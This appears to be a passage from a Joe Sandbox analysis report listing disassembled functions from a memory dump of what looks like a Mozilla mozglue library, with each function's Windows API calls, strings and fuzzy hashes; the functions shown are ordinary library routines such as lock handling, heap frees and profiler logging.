strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6B0B4AB7,?,6B0743CF,?,6B0742D2), ref: 6B0B4BEE

Strings

pid:, xrefs: 6B0B4BE8

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: 294dcc7f608fa5c95f1f35e6d495fbf00c9fe710b67f1fe72eaaa57ad2c69914
Instruction ID: 925f77ac377aac0fb31eca05e0b8fec5f54b72b665f4d7d3fc2f023c339d2149
Opcode Fuzzy Hash: 294dcc7f608fa5c95f1f35e6d495fbf00c9fe710b67f1fe72eaaa57ad2c69914
Instruction Fuzzy Hash: 3041E871700255ABCB18CFB8EC80A9FBFE9EF85324B144638E969D7381D6359A0487A1

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DAAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6B0FE220,?), ref: 6B0DBC2D
ReleaseSRWLockExclusive.KERNEL32(6B0FE220), ref: 6B0DBC42
RtlFreeHeap.NTDLL(?,00000000,6B0EE300), ref: 6B0DBC82
RtlFreeUnicodeString.NTDLL(6B0FE210), ref: 6B0DBC91
RtlFreeUnicodeString.NTDLL(6B0FE208), ref: 6B0DBCA3
RtlFreeHeap.NTDLL(?,00000000,6B0FE21C), ref: 6B0DBCD2
free.MOZGLUE(?), ref: 6B0DBCD8

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 94276c0833c427aa3228c2dddd44d14de75fa4e4719fc78576caae2079a12e12
Instruction ID: c551d672195bcf4a0ab1d5ff08376bfb45128e1e9c31adea6b3624bfa39b6961
Opcode Fuzzy Hash: 94276c0833c427aa3228c2dddd44d14de75fa4e4719fc78576caae2079a12e12
Instruction Fuzzy Hash: 9F212872600304CFE7248F16D880B66BFE9FF45754F8584ADE91A5B690CB39F842CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6B0838A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6B0FE220,?,?,?,?,6B083899,?), ref: 6B0838B2
ReleaseSRWLockExclusive.KERNEL32(6B0FE220,?,?,?,6B083899,?), ref: 6B0838C3
free.MOZGLUE(00000000,?,?,?,6B083899,?), ref: 6B0838F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6B083920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6B083899,?), ref: 6B08392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6B083899,?), ref: 6B083943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6B08396E

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: e8bff4e302797c5b7ce286cd945ee25e121b51a0a875293f4c938a3e3759cbc0
Instruction ID: 236de90a276bd4dc72a3db7f22dcc55b14c9dd35dc7e32351ded885a1e37fdaf
Opcode Fuzzy Hash: e8bff4e302797c5b7ce286cd945ee25e121b51a0a875293f4c938a3e3759cbc0
Instruction Fuzzy Hash: 5F21E172600710DFDB24CF25D880B46BFE9EF89324F118469E95A97210CB39E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6B095B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,6B0956EE,?,00000001), ref: 6B095B85
EnterCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095B90
LeaveCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095BD8
GetTickCount64.KERNEL32 ref: 6B095BE4

Strings

Vk, xrefs: 6B095B5C
Vk, xrefs: 6B095C35

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
String ID: Vk$Vk
API String ID: 2796706680-1126992279
Opcode ID: 80fcb1411f2ea0f10f34f312706795ff5b0947404e5d09ce78836053ec614283
Instruction ID: a298b627de680807a8e62dd05f2089f9bcf65fe36aec3652841b20ae81a14de0
Opcode Fuzzy Hash: 80fcb1411f2ea0f10f34f312706795ff5b0947404e5d09ce78836053ec614283
Instruction Fuzzy Hash: 86216D757057049FCB08DF69E45565ABFEEEF8A610F04C92EE99A87390DB34E804CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6B0CD1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0CD1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD1F5

Part of subcall function 6B0CAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6B0CAE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD211
GetCurrentThreadId.KERNEL32 ref: 6B0CD217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD279
free.MOZGLUE(?), ref: 6B0CD2B2

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 624ea1ee37dd631c22a3ff731f49789ee7665dc81080293323ff7be259bb26c2
Instruction ID: a02baf920f9587fa69be09d903f75284ad0fb6e2b997a66a7ed5941311e89c8e
Opcode Fuzzy Hash: 624ea1ee37dd631c22a3ff731f49789ee7665dc81080293323ff7be259bb26c2
Instruction Fuzzy Hash: 24215E75604705EFCB08DF64D488A9EBFA5FF8A324F10462EE91A87340DB35E905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6B082070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6B0AAB89: EnterCriticalSection.KERNEL32(6B0FE370,?,?,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284), ref: 6B0AAB94
Part of subcall function 6B0AAB89: LeaveCriticalSection.KERNEL32(6B0FE370,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284,?,?,6B0956F6), ref: 6B0AABD1

LoadLibraryW.KERNEL32(combase.dll,6B081C5F), ref: 6B0820AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6B0820CD
__Init_thread_footer.LIBCMT ref: 6B0820E1
FreeLibrary.KERNEL32 ref: 6B082124

Strings

combase.dll, xrefs: 6B0820A9
CoInitializeSecurity, xrefs: 6B0820C7

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: 618b28bd5879b1a5bc9b6a3637af38d95d44713de82f53f6991a2368bb8e44a9
Instruction ID: 873d90f856903f7f612bc085c9a8a18764f5a136a63690869dff6dc8e8b0c09a
Opcode Fuzzy Hash: 618b28bd5879b1a5bc9b6a3637af38d95d44713de82f53f6991a2368bb8e44a9
Instruction Fuzzy Hash: DC216A76201209AFDF198F94EC48E8A3FBEFB4A7A4F104014FE0592250D73AD962CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B99A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F

GetCurrentThreadId.KERNEL32 ref: 6B0B99C1
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0B99CE
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0B99F8
GetCurrentThreadId.KERNEL32 ref: 6B0B9A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0B9A0D

Part of subcall function 6B0B9A60: GetCurrentThreadId.KERNEL32 ref: 6B0B9A95
Part of subcall function 6B0B9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0B9A9D
Part of subcall function 6B0B9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6B0B9ACC
Part of subcall function 6B0B9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0B9BA7
Part of subcall function 6B0B9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6B0B9BB8
Part of subcall function 6B0B9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6B0B9BC9

Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6B0B9A15

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: a79ea055221a0903fcf088973c70b8b155971fe5d663f29d984b6116c21fe049
Instruction ID: c8a5f1efb24961210ff10adc24141cd8246e4025a26fa685a3d2b117ab9f3684
Opcode Fuzzy Hash: a79ea055221a0903fcf088973c70b8b155971fe5d663f29d984b6116c21fe049
Instruction Fuzzy Hash: 7B01D235E051249BDB189F69B8497693FACEB97268F054056FD0A53342DB3ED802CAF2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0862E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6B0AAB89: EnterCriticalSection.KERNEL32(6B0FE370,?,?,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284), ref: 6B0AAB94
Part of subcall function 6B0AAB89: LeaveCriticalSection.KERNEL32(6B0FE370,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284,?,?,6B0956F6), ref: 6B0AABD1

LoadLibraryW.KERNEL32(combase.dll), ref: 6B08631B
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6B08633A
__Init_thread_footer.LIBCMT ref: 6B08634E
FreeLibrary.KERNEL32 ref: 6B086376

Strings

combase.dll, xrefs: 6B086316
CoUninitialize, xrefs: 6B086334

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoUninitialize$combase.dll
API String ID: 4190559335-3846590027
Opcode ID: 9245e43e6321455b8df8f532b662b318f3c5cd24444ec709a2c723406593c072
Instruction ID: 72dffd40c7bba700204475e85a61715a270220df310392a394d93493e94cac9a
Opcode Fuzzy Hash: 9245e43e6321455b8df8f532b662b318f3c5cd24444ec709a2c723406593c072
Instruction Fuzzy Hash: 5E0148B4726201CBEF088F68F548B147FAEB70AB54F004169DE02C3681EB38E506CE65

Uniqueness

Uniqueness Score: -1.00%

Function 6B0C9240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0C9BAE
free.MOZGLUE(?,?), ref: 6B0C9BC3
free.MOZGLUE(?,?), ref: 6B0C9BD9

Part of subcall function 6B0C93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0C94C8
Part of subcall function 6B0C93B0: free.MOZGLUE(6B0C9281,?), ref: 6B0C94DD

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 38c0aa9d3c9b48c53f53501414e8b3a808ee7aaab1e6a746b43a2a8d263e3173
Instruction ID: 1ef9b0977f86a36d3dc9df14578fb4b2ba91ec4576895c4f873a80fbbf58116b
Opcode Fuzzy Hash: 38c0aa9d3c9b48c53f53501414e8b3a808ee7aaab1e6a746b43a2a8d263e3173
Instruction Fuzzy Hash: 58B1C271A047048BCB0ACF68C48065FFBF5FFC9328B544659E8599B342DB35E946CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B71A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6B0B6060: moz_xmalloc.MOZGLUE(00000024,ABC14F15,00000000,?,00000000,?,?,6B0B5FCB,6B0B79A3), ref: 6B0B6078

free.MOZGLUE(-00000001), ref: 6B0B72F6
free.MOZGLUE(?), ref: 6B0B7311

Strings

333s, xrefs: 6B0B731B
333s, xrefs: 6B0B7226
Spliced unique strings, xrefs: 6B0B7340
Copied unique strings, xrefs: 6B0B7320

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: 7f5ed8a95a1d3031b7ddd8c9fa4e139abde94c1e5013c503fd0928d22492f16a
Instruction ID: f5c5badb719500591c98ef8b423787413bf456156ed882d48dea388df5587b76
Opcode Fuzzy Hash: 7f5ed8a95a1d3031b7ddd8c9fa4e139abde94c1e5013c503fd0928d22492f16a
Instruction Fuzzy Hash: E7717571F002158FDB1CCF69D89179DBBF2BF84314F25812DD81AA7250DB3AA946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6B0CC160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6B0CC1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6B0CC293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6B0CC29E

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: 0c04ac2e07b00b3e8e25e14e5773bf1f25e4de92651358837cbb24846553d8f3
Instruction ID: 3e6b3294811b1ac44640f6c76dedb45b836871489549f3987b3ba3a48287e231
Opcode Fuzzy Hash: 0c04ac2e07b00b3e8e25e14e5773bf1f25e4de92651358837cbb24846553d8f3
Instruction Fuzzy Hash: 78619C719042189FCB29CFACD880AAFBFF6FF49310F154569E802A7250C735A945CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0C9F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0C9FDB
free.MOZGLUE(?,?), ref: 6B0C9FF0
free.MOZGLUE(?,?), ref: 6B0CA006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0CA0BE
free.MOZGLUE(?,?), ref: 6B0CA0D5
free.MOZGLUE(?,?), ref: 6B0CA0EB

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 573be8adbf11fdb5989e290562899ea177ab70ded3c2b3330164d2b4dbab56da
Instruction ID: 232c98d582ec4a98739ebab79c667a9ea8347a496ee68d134e8e0507fa53baa5
Opcode Fuzzy Hash: 573be8adbf11fdb5989e290562899ea177ab70ded3c2b3330164d2b4dbab56da
Instruction Fuzzy Hash: D161B0758087019FC755CF58C48065BB7F5FF88368F609659EC999B202EB36E982CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BCA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6B0BCA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0BCA69
Sleep.KERNEL32 ref: 6B0BCADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0BCAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0BCAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6B0BCB19

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: ed1fd172b3210a172a529f88a19ee0a116faa93031ebd3254f1ba7b167952e81
Instruction ID: b568886c2de0f6634cea2d1fabcd54253d013e98c76c46b88d1d919929fba811
Opcode Fuzzy Hash: ed1fd172b3210a172a529f88a19ee0a116faa93031ebd3254f1ba7b167952e81
Instruction Fuzzy Hash: 99212331A047088BC30CAB38984166FBFBAFFC6749F408628E845A7180FF75D5858781

Uniqueness

Uniqueness Score: -1.00%

Function 6B0CC810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6B0CC82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6B0CC842

Part of subcall function 6B0CCAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6B0EB5EB,00000000), ref: 6B0CCB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6B0CC863
std::_Facet_Register.LIBCPMT ref: 6B0CC875

Part of subcall function 6B0AB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6B0EB636,?), ref: 6B0AB143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6B0CC89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0CC8BC

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: 22b637a1eede3b44f81b2c97bd0de51af3b0485cde5031fb81b65c730ec97f71
Instruction ID: 5bcd51d671d3df3e96550633181e86b888ce697604248368b3d48c7aeebfc2bb
Opcode Fuzzy Hash: 22b637a1eede3b44f81b2c97bd0de51af3b0485cde5031fb81b65c730ec97f71
Instruction Fuzzy Hash: D5112175B002099BCB04DFA4E8999AF7FB9EF89354F100529EA0697341EB34D905CFD6

Uniqueness

Uniqueness Score: -1.00%

Function 6B07EB90 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000104), ref: 6B07EBB5

Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6B0AD7F3), ref: 6B07EBC3
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6B0AD7F3), ref: 6B07EBD6
free.MOZGLUE(?,?,?,?,?,?,6B0AD7F3), ref: 6B07EBF6
free.MOZGLUE(00000000,?,?,?,?,?,?,6B0AD7F3), ref: 6B07EC0E

Part of subcall function 6B095E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6B095EDB
Part of subcall function 6B095E90: memset.VCRUNTIME140(ewk,000000E5,?), ref: 6B095F27
Part of subcall function 6B095E90: LeaveCriticalSection.KERNEL32(?), ref: 6B095FB2

GetLastError.KERNEL32(?,?,?,?,?,?,6B0AD7F3), ref: 6B07EC1A

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

